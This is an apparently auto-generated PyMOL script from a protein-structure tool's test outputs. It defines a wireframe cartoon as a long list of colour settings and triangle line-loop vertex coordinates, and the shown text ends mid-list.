| 32
| 1
| 32
| 32
| 0.548387
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
082961edc364e6db346940f7196ee9f5e98dbefd
| 304,733
|
py
|
Python
|
tests/jobs_output/self_scripting/cgo_cartoon_wf.py
|
kliment-olechnovic/voronota
|
4e3063aa86b44f1f2e7b088ec9976f3e12047549
|
[
"MIT"
] | 9
|
2019-08-23T10:46:18.000Z
|
2022-03-11T12:20:27.000Z
|
tests/jobs_output/self_scripting/cgo_cartoon_wf.py
|
kliment-olechnovic/voronota
|
4e3063aa86b44f1f2e7b088ec9976f3e12047549
|
[
"MIT"
] | null | null | null |
tests/jobs_output/self_scripting/cgo_cartoon_wf.py
|
kliment-olechnovic/voronota
|
4e3063aa86b44f1f2e7b088ec9976f3e12047549
|
[
"MIT"
] | 3
|
2020-09-17T19:07:47.000Z
|
2021-04-29T01:19:38.000Z
|
from pymol.cgo import *
from pymol import cmd
cartoon_wf = [COLOR, 0.000, 0.757, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 22.191, 22.736, 28.234,
VERTEX, 22.021, 22.906, 28.175,
VERTEX, 22.654, 23.202, 28.107,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.021, 22.906, 28.175,
VERTEX, 22.654, 23.202, 28.107,
VERTEX, 22.489, 23.366, 28.043,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.654, 23.202, 28.107,
VERTEX, 22.489, 23.366, 28.043,
VERTEX, 23.289, 23.748, 27.729,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.489, 23.366, 28.043,
VERTEX, 23.289, 23.748, 27.729,
VERTEX, 23.124, 23.906, 27.657,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.289, 23.748, 27.729,
VERTEX, 23.124, 23.906, 27.657,
VERTEX, 23.723, 24.054, 27.321,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.124, 23.906, 27.657,
VERTEX, 23.723, 24.054, 27.321,
VERTEX, 23.552, 24.210, 27.242,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.723, 24.054, 27.321,
VERTEX, 23.552, 24.210, 27.242,
VERTEX, 23.702, 23.940, 27.123,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.552, 24.210, 27.242,
VERTEX, 23.702, 23.940, 27.123,
VERTEX, 23.524, 24.101, 27.042,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.702, 23.940, 27.123,
VERTEX, 23.524, 24.101, 27.042,
VERTEX, 23.239, 23.474, 27.250,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.524, 24.101, 27.042,
VERTEX, 23.239, 23.474, 27.250,
VERTEX, 23.055, 23.641, 27.174,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.239, 23.474, 27.250,
VERTEX, 23.055, 23.641, 27.174,
VERTEX, 22.604, 22.929, 27.628,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.055, 23.641, 27.174,
VERTEX, 22.604, 22.929, 27.628,
VERTEX, 22.421, 23.101, 27.561,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.604, 22.929, 27.628,
VERTEX, 22.421, 23.101, 27.561,
VERTEX, 22.170, 22.623, 28.036,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.421, 23.101, 27.561,
VERTEX, 22.170, 22.623, 28.036,
VERTEX, 21.992, 22.797, 27.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.170, 22.623, 28.036,
VERTEX, 21.992, 22.797, 27.976,
VERTEX, 22.191, 22.736, 28.234,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.992, 22.797, 27.976,
VERTEX, 22.191, 22.736, 28.234,
VERTEX, 22.021, 22.906, 28.175,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.021, 22.906, 28.175,
VERTEX, 21.833, 23.097, 28.118,
VERTEX, 22.489, 23.366, 28.043,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.833, 23.097, 28.118,
VERTEX, 22.489, 23.366, 28.043,
VERTEX, 22.305, 23.551, 27.979,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.489, 23.366, 28.043,
VERTEX, 22.305, 23.551, 27.979,
VERTEX, 23.124, 23.906, 27.657,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.305, 23.551, 27.979,
VERTEX, 23.124, 23.906, 27.657,
VERTEX, 22.938, 24.085, 27.582,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.124, 23.906, 27.657,
VERTEX, 22.938, 24.085, 27.582,
VERTEX, 23.552, 24.210, 27.242,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.938, 24.085, 27.582,
VERTEX, 23.552, 24.210, 27.242,
VERTEX, 23.362, 24.385, 27.160,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.552, 24.210, 27.242,
VERTEX, 23.362, 24.385, 27.160,
VERTEX, 23.524, 24.101, 27.042,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.362, 24.385, 27.160,
VERTEX, 23.524, 24.101, 27.042,
VERTEX, 23.329, 24.277, 26.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.524, 24.101, 27.042,
VERTEX, 23.329, 24.277, 26.961,
VERTEX, 23.055, 23.641, 27.174,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.329, 24.277, 26.961,
VERTEX, 23.055, 23.641, 27.174,
VERTEX, 22.857, 23.823, 27.100,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.055, 23.641, 27.174,
VERTEX, 22.857, 23.823, 27.100,
VERTEX, 22.421, 23.101, 27.561,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.857, 23.823, 27.100,
VERTEX, 22.421, 23.101, 27.561,
VERTEX, 22.224, 23.289, 27.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.421, 23.101, 27.561,
VERTEX, 22.224, 23.289, 27.497,
VERTEX, 21.992, 22.797, 27.976,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.224, 23.289, 27.497,
VERTEX, 21.992, 22.797, 27.976,
VERTEX, 21.799, 22.988, 27.919,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.992, 22.797, 27.976,
VERTEX, 21.799, 22.988, 27.919,
VERTEX, 22.021, 22.906, 28.175,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.799, 22.988, 27.919,
VERTEX, 22.021, 22.906, 28.175,
VERTEX, 21.833, 23.097, 28.118,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.833, 23.097, 28.118,
VERTEX, 21.610, 23.321, 28.056,
VERTEX, 22.305, 23.551, 27.979,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.610, 23.321, 28.056,
VERTEX, 22.305, 23.551, 27.979,
VERTEX, 22.083, 23.771, 27.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.305, 23.551, 27.979,
VERTEX, 22.083, 23.771, 27.907,
VERTEX, 22.938, 24.085, 27.582,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.083, 23.771, 27.907,
VERTEX, 22.938, 24.085, 27.582,
VERTEX, 22.715, 24.297, 27.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.938, 24.085, 27.582,
VERTEX, 22.715, 24.297, 27.497,
VERTEX, 23.362, 24.385, 27.160,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.715, 24.297, 27.497,
VERTEX, 23.362, 24.385, 27.160,
VERTEX, 23.136, 24.591, 27.068,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.362, 24.385, 27.160,
VERTEX, 23.136, 24.591, 27.068,
VERTEX, 23.329, 24.277, 26.961,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.136, 24.591, 27.068,
VERTEX, 23.329, 24.277, 26.961,
VERTEX, 23.099, 24.481, 26.870,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.329, 24.277, 26.961,
VERTEX, 23.099, 24.481, 26.870,
VERTEX, 22.857, 23.823, 27.100,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.099, 24.481, 26.870,
VERTEX, 22.857, 23.823, 27.100,
VERTEX, 22.626, 24.031, 27.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.857, 23.823, 27.100,
VERTEX, 22.626, 24.031, 27.019,
VERTEX, 22.224, 23.289, 27.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.626, 24.031, 27.019,
VERTEX, 22.224, 23.289, 27.497,
VERTEX, 21.994, 23.506, 27.429,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.224, 23.289, 27.497,
VERTEX, 21.994, 23.506, 27.429,
VERTEX, 21.799, 22.988, 27.919,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.994, 23.506, 27.429,
VERTEX, 21.799, 22.988, 27.919,
VERTEX, 21.574, 23.211, 27.858,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.799, 22.988, 27.919,
VERTEX, 21.574, 23.211, 27.858,
VERTEX, 21.833, 23.097, 28.118,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.574, 23.211, 27.858,
VERTEX, 21.833, 23.097, 28.118,
VERTEX, 21.610, 23.321, 28.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.610, 23.321, 28.056,
VERTEX, 21.336, 23.594, 27.982,
VERTEX, 22.083, 23.771, 27.907,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.336, 23.594, 27.982,
VERTEX, 22.083, 23.771, 27.907,
VERTEX, 21.809, 24.039, 27.819,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.083, 23.771, 27.907,
VERTEX, 21.809, 24.039, 27.819,
VERTEX, 22.715, 24.297, 27.497,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.809, 24.039, 27.819,
VERTEX, 22.715, 24.297, 27.497,
VERTEX, 22.438, 24.555, 27.394,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.715, 24.297, 27.497,
VERTEX, 22.438, 24.555, 27.394,
VERTEX, 23.136, 24.591, 27.068,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.438, 24.555, 27.394,
VERTEX, 23.136, 24.591, 27.068,
VERTEX, 22.856, 24.840, 26.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.136, 24.591, 27.068,
VERTEX, 22.856, 24.840, 26.955,
VERTEX, 23.099, 24.481, 26.870,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.856, 24.840, 26.955,
VERTEX, 23.099, 24.481, 26.870,
VERTEX, 22.817, 24.726, 26.759,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.099, 24.481, 26.870,
VERTEX, 22.817, 24.726, 26.759,
VERTEX, 22.626, 24.031, 27.019,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.817, 24.726, 26.759,
VERTEX, 22.626, 24.031, 27.019,
VERTEX, 22.344, 24.281, 26.922,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.626, 24.031, 27.019,
VERTEX, 22.344, 24.281, 26.922,
VERTEX, 21.994, 23.506, 27.429,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.344, 24.281, 26.922,
VERTEX, 21.994, 23.506, 27.429,
VERTEX, 21.715, 23.765, 27.347,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.994, 23.506, 27.429,
VERTEX, 21.715, 23.765, 27.347,
VERTEX, 21.574, 23.211, 27.858,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.715, 23.765, 27.347,
VERTEX, 21.574, 23.211, 27.858,
VERTEX, 21.297, 23.480, 27.786,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.574, 23.211, 27.858,
VERTEX, 21.297, 23.480, 27.786,
VERTEX, 21.610, 23.321, 28.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.297, 23.480, 27.786,
VERTEX, 21.610, 23.321, 28.056,
VERTEX, 21.336, 23.594, 27.982,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.336, 23.594, 27.982,
VERTEX, 20.993, 23.927, 27.887,
VERTEX, 21.809, 24.039, 27.819,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.993, 23.927, 27.887,
VERTEX, 21.809, 24.039, 27.819,
VERTEX, 21.466, 24.366, 27.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.809, 24.039, 27.819,
VERTEX, 21.466, 24.366, 27.708,
VERTEX, 22.438, 24.555, 27.394,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.466, 24.366, 27.708,
VERTEX, 22.438, 24.555, 27.394,
VERTEX, 22.092, 24.870, 27.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.438, 24.555, 27.394,
VERTEX, 22.092, 24.870, 27.264,
VERTEX, 22.856, 24.840, 26.955,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.092, 24.870, 27.264,
VERTEX, 22.856, 24.840, 26.955,
VERTEX, 22.504, 25.143, 26.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.856, 24.840, 26.955,
VERTEX, 22.504, 25.143, 26.813,
VERTEX, 22.817, 24.726, 26.759,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.504, 25.143, 26.813,
VERTEX, 22.817, 24.726, 26.759,
VERTEX, 22.462, 25.026, 26.620,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.817, 24.726, 26.759,
VERTEX, 22.462, 25.026, 26.620,
VERTEX, 22.344, 24.281, 26.922,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.462, 25.026, 26.620,
VERTEX, 22.344, 24.281, 26.922,
VERTEX, 21.990, 24.586, 26.799,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.344, 24.281, 26.922,
VERTEX, 21.990, 24.586, 26.799,
VERTEX, 21.715, 23.765, 27.347,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.990, 24.586, 26.799,
VERTEX, 21.715, 23.765, 27.347,
VERTEX, 21.364, 24.082, 27.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.715, 23.765, 27.347,
VERTEX, 21.364, 24.082, 27.243,
VERTEX, 21.297, 23.480, 27.786,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.364, 24.082, 27.243,
VERTEX, 21.297, 23.480, 27.786,
VERTEX, 20.951, 23.809, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.297, 23.480, 27.786,
VERTEX, 20.951, 23.809, 27.694,
VERTEX, 21.336, 23.594, 27.982,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.951, 23.809, 27.694,
VERTEX, 21.336, 23.594, 27.982,
VERTEX, 20.993, 23.927, 27.887,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.993, 23.927, 27.887,
VERTEX, 20.653, 24.256, 27.794,
VERTEX, 21.466, 24.366, 27.708,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.653, 24.256, 27.794,
VERTEX, 21.466, 24.366, 27.708,
VERTEX, 21.126, 24.688, 27.600,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.466, 24.366, 27.708,
VERTEX, 21.126, 24.688, 27.600,
VERTEX, 22.092, 24.870, 27.264,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.126, 24.688, 27.600,
VERTEX, 22.092, 24.870, 27.264,
VERTEX, 21.748, 25.179, 27.136,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.092, 24.870, 27.264,
VERTEX, 21.748, 25.179, 27.136,
VERTEX, 22.504, 25.143, 26.813,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.748, 25.179, 27.136,
VERTEX, 22.504, 25.143, 26.813,
VERTEX, 22.155, 25.442, 26.674,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.504, 25.143, 26.813,
VERTEX, 22.155, 25.442, 26.674,
VERTEX, 22.462, 25.026, 26.620,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.155, 25.442, 26.674,
VERTEX, 22.462, 25.026, 26.620,
VERTEX, 22.107, 25.322, 26.483,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.462, 25.026, 26.620,
VERTEX, 22.107, 25.322, 26.483,
VERTEX, 21.990, 24.586, 26.799,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.107, 25.322, 26.483,
VERTEX, 21.990, 24.586, 26.799,
VERTEX, 21.634, 24.891, 26.677,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.990, 24.586, 26.799,
VERTEX, 21.634, 24.891, 26.677,
VERTEX, 21.364, 24.082, 27.243,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.634, 24.891, 26.677,
VERTEX, 21.364, 24.082, 27.243,
VERTEX, 21.012, 24.399, 27.141,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.364, 24.082, 27.243,
VERTEX, 21.012, 24.399, 27.141,
VERTEX, 20.951, 23.809, 27.694,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.012, 24.399, 27.141,
VERTEX, 20.951, 23.809, 27.694,
VERTEX, 20.605, 24.137, 27.604,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.951, 23.809, 27.694,
VERTEX, 20.605, 24.137, 27.604,
VERTEX, 20.993, 23.927, 27.887,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.605, 24.137, 27.604,
VERTEX, 20.993, 23.927, 27.887,
VERTEX, 20.653, 24.256, 27.794,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.653, 24.256, 27.794,
VERTEX, 20.384, 24.521, 27.727,
VERTEX, 21.126, 24.688, 27.600,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.384, 24.521, 27.727,
VERTEX, 21.126, 24.688, 27.600,
VERTEX, 20.859, 24.944, 27.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.126, 24.688, 27.600,
VERTEX, 20.859, 24.944, 27.522,
VERTEX, 21.748, 25.179, 27.136,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.859, 24.944, 27.522,
VERTEX, 21.748, 25.179, 27.136,
VERTEX, 21.478, 25.424, 27.042,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.748, 25.179, 27.136,
VERTEX, 21.478, 25.424, 27.042,
VERTEX, 22.155, 25.442, 26.674,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.478, 25.424, 27.042,
VERTEX, 22.155, 25.442, 26.674,
VERTEX, 21.878, 25.679, 26.569,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.155, 25.442, 26.674,
VERTEX, 21.878, 25.679, 26.569,
VERTEX, 22.107, 25.322, 26.483,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.878, 25.679, 26.569,
VERTEX, 22.107, 25.322, 26.483,
VERTEX, 21.824, 25.560, 26.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.107, 25.322, 26.483,
VERTEX, 21.824, 25.560, 26.380,
VERTEX, 21.634, 24.891, 26.677,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.824, 25.560, 26.380,
VERTEX, 21.634, 24.891, 26.677,
VERTEX, 21.348, 25.137, 26.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.634, 24.891, 26.677,
VERTEX, 21.348, 25.137, 26.586,
VERTEX, 21.012, 24.399, 27.141,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.348, 25.137, 26.586,
VERTEX, 21.012, 24.399, 27.141,
VERTEX, 20.729, 24.657, 27.066,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.012, 24.399, 27.141,
VERTEX, 20.729, 24.657, 27.066,
VERTEX, 20.605, 24.137, 27.604,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.729, 24.657, 27.066,
VERTEX, 20.605, 24.137, 27.604,
VERTEX, 20.330, 24.402, 27.539,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.605, 24.137, 27.604,
VERTEX, 20.330, 24.402, 27.539,
VERTEX, 20.653, 24.256, 27.794,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.330, 24.402, 27.539,
VERTEX, 20.653, 24.256, 27.794,
VERTEX, 20.384, 24.521, 27.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.384, 24.521, 27.727,
VERTEX, 20.168, 24.737, 27.682,
VERTEX, 20.859, 24.944, 27.522,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.168, 24.737, 27.682,
VERTEX, 20.859, 24.944, 27.522,
VERTEX, 20.646, 25.152, 27.466,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.859, 24.944, 27.522,
VERTEX, 20.646, 25.152, 27.466,
VERTEX, 21.478, 25.424, 27.042,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.646, 25.152, 27.466,
VERTEX, 21.478, 25.424, 27.042,
VERTEX, 21.262, 25.622, 26.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.478, 25.424, 27.042,
VERTEX, 21.262, 25.622, 26.973,
VERTEX, 21.878, 25.679, 26.569,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.262, 25.622, 26.973,
VERTEX, 21.878, 25.679, 26.569,
VERTEX, 21.655, 25.872, 26.491,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.878, 25.679, 26.569,
VERTEX, 21.655, 25.872, 26.491,
VERTEX, 21.824, 25.560, 26.380,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.655, 25.872, 26.491,
VERTEX, 21.824, 25.560, 26.380,
VERTEX, 21.594, 25.754, 26.304,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.824, 25.560, 26.380,
VERTEX, 21.594, 25.754, 26.304,
VERTEX, 21.348, 25.137, 26.586,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.594, 25.754, 26.304,
VERTEX, 21.348, 25.137, 26.586,
VERTEX, 21.116, 25.339, 26.519,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.348, 25.137, 26.586,
VERTEX, 21.116, 25.339, 26.519,
VERTEX, 20.729, 24.657, 27.066,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.116, 25.339, 26.519,
VERTEX, 20.729, 24.657, 27.066,
VERTEX, 20.500, 24.869, 27.012,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.729, 24.657, 27.066,
VERTEX, 20.500, 24.869, 27.012,
VERTEX, 20.330, 24.402, 27.539,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.500, 24.869, 27.012,
VERTEX, 20.330, 24.402, 27.539,
VERTEX, 20.107, 24.619, 27.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.330, 24.402, 27.539,
VERTEX, 20.107, 24.619, 27.494,
VERTEX, 20.384, 24.521, 27.727,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.107, 24.619, 27.494,
VERTEX, 20.384, 24.521, 27.727,
VERTEX, 20.168, 24.737, 27.682,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.168, 24.737, 27.682,
VERTEX, 19.988, 24.921, 27.651,
VERTEX, 20.646, 25.152, 27.466,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.988, 24.921, 27.651,
VERTEX, 20.646, 25.152, 27.466,
VERTEX, 20.469, 25.328, 27.427,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.646, 25.152, 27.466,
VERTEX, 20.469, 25.328, 27.427,
VERTEX, 21.262, 25.622, 26.973,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.469, 25.328, 27.427,
VERTEX, 21.262, 25.622, 26.973,
VERTEX, 21.082, 25.789, 26.922,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.262, 25.622, 26.973,
VERTEX, 21.082, 25.789, 26.922,
VERTEX, 21.655, 25.872, 26.491,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.082, 25.789, 26.922,
VERTEX, 21.655, 25.872, 26.491,
VERTEX, 21.468, 26.034, 26.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.655, 25.872, 26.491,
VERTEX, 21.468, 26.034, 26.433,
VERTEX, 21.594, 25.754, 26.304,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.468, 26.034, 26.433,
VERTEX, 21.594, 25.754, 26.304,
VERTEX, 21.401, 25.919, 26.246,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.594, 25.754, 26.304,
VERTEX, 21.401, 25.919, 26.246,
VERTEX, 21.116, 25.339, 26.519,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.401, 25.919, 26.246,
VERTEX, 21.116, 25.339, 26.519,
VERTEX, 20.920, 25.511, 26.470,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.116, 25.339, 26.519,
VERTEX, 20.920, 25.511, 26.470,
VERTEX, 20.500, 24.869, 27.012,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.920, 25.511, 26.470,
VERTEX, 20.500, 24.869, 27.012,
VERTEX, 20.306, 25.050, 26.975,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.500, 24.869, 27.012,
VERTEX, 20.306, 25.050, 26.975,
VERTEX, 20.107, 24.619, 27.494,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.306, 25.050, 26.975,
VERTEX, 20.107, 24.619, 27.494,
VERTEX, 19.920, 24.806, 27.465,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.107, 24.619, 27.494,
VERTEX, 19.920, 24.806, 27.465,
VERTEX, 20.168, 24.737, 27.682,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.920, 24.806, 27.465,
VERTEX, 20.168, 24.737, 27.682,
VERTEX, 19.988, 24.921, 27.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.988, 24.921, 27.651,
VERTEX, 19.825, 25.090, 27.631,
VERTEX, 20.469, 25.328, 27.427,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.825, 25.090, 27.631,
VERTEX, 20.469, 25.328, 27.427,
VERTEX, 20.308, 25.490, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.469, 25.328, 27.427,
VERTEX, 20.308, 25.490, 27.397,
VERTEX, 21.082, 25.789, 26.922,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.308, 25.490, 27.397,
VERTEX, 21.082, 25.789, 26.922,
VERTEX, 20.918, 25.943, 26.881,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.082, 25.789, 26.922,
VERTEX, 20.918, 25.943, 26.881,
VERTEX, 21.468, 26.034, 26.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.918, 25.943, 26.881,
VERTEX, 21.468, 26.034, 26.433,
VERTEX, 21.298, 26.182, 26.385,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.468, 26.034, 26.433,
VERTEX, 21.298, 26.182, 26.385,
VERTEX, 21.401, 25.919, 26.246,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.298, 26.182, 26.385,
VERTEX, 21.401, 25.919, 26.246,
VERTEX, 21.225, 26.068, 26.199,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.401, 25.919, 26.246,
VERTEX, 21.225, 26.068, 26.199,
VERTEX, 20.920, 25.511, 26.470,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.225, 26.068, 26.199,
VERTEX, 20.920, 25.511, 26.470,
VERTEX, 20.742, 25.668, 26.433,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.920, 25.511, 26.470,
VERTEX, 20.742, 25.668, 26.433,
VERTEX, 20.306, 25.050, 26.975,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.742, 25.668, 26.433,
VERTEX, 20.306, 25.050, 26.975,
VERTEX, 20.132, 25.216, 26.949,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.306, 25.050, 26.975,
VERTEX, 20.132, 25.216, 26.949,
VERTEX, 19.920, 24.806, 27.465,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.132, 25.216, 26.949,
VERTEX, 19.920, 24.806, 27.465,
VERTEX, 19.752, 24.976, 27.446,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.920, 24.806, 27.465,
VERTEX, 19.752, 24.976, 27.446,
VERTEX, 19.988, 24.921, 27.651,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.752, 24.976, 27.446,
VERTEX, 19.988, 24.921, 27.651,
VERTEX, 19.825, 25.090, 27.631,
END,
COLOR, 0.000, 0.773, 1.000,
BEGIN, LINE_LOOP,
VERTEX, 19.825, 25.090, 27.631,
VERTEX, 19.662, 25.260, 27.616,
VERTEX, 20.308, 25.490, 27.397,
END,
BEGIN, LINE_LOOP,
VERTEX, 19.662, 25.260, 27.616,
VERTEX, 20.308, 25.490, 27.397,
VERTEX, 20.145, 25.655, 27.372,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.308, 25.490, 27.397,
VERTEX, 20.145, 25.655, 27.372,
VERTEX, 20.918, 25.943, 26.881,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.145, 25.655, 27.372,
VERTEX, 20.918, 25.943, 26.881,
VERTEX, 20.751, 26.099, 26.844,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.918, 25.943, 26.881,
VERTEX, 20.751, 26.099, 26.844,
VERTEX, 21.298, 26.182, 26.385,
END,
BEGIN, LINE_LOOP,
VERTEX, 20.751, 26.099, 26.844,
VERTEX, 21.298, 26.182, 26.385,
VERTEX, 21.125, 26.332, 26.340,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.298, 26.182, 26.385,
VERTEX, 21.125, 26.332, 26.340,
VERTEX, 21.225, 26.068, 26.199,
END,
BEGIN, LINE_LOOP,
VERTEX, 21.125, 26.332, 26.340,
VERTEX, 21.225, 26.068, 26.199,
